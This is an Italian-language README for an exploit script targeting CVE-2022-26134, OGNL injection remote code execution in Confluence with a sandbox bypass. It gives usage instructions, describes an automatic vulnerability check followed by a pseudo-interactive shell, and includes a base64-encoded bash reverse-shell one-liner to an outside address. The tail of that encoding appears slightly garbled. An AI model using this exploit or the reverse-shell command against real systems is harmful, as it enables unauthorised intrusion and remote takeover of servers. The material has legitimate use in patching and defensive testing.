
[CVE-2022-26134]Confluence Espressione OGNL iniettata RCE con bypass della sandbox
POC ed exp per RCE da iniezione di espressione OGNL in Confluence (CVE-2022-26134)
Aggiunto bypass sandbox, supporto per versioni elevate.
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/
Lo script controllerà automaticamente se il target è vulnerabile e, in caso affermativo, entrerà in una shell pseudo-interattiva.
Test su Linux:

Test su Windows:

Basta inserire 'q' quando si desidera uscire.
I parametri dei comandi vengono passati direttamente al metodo runtime.exec, che non ha il contesto della shell.
Quindi.
Su Windows, alcuni comandi come dir non possono essere eseguiti direttamente, puoi usare cmd.exe /c dir.
Su Linux, alcuni simboli speciali non possono avere effetto. Se hai bisogno di eseguire comandi con simboli speciali come la reverse shell, puoi codificarlo in base64 e poi usare bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i}.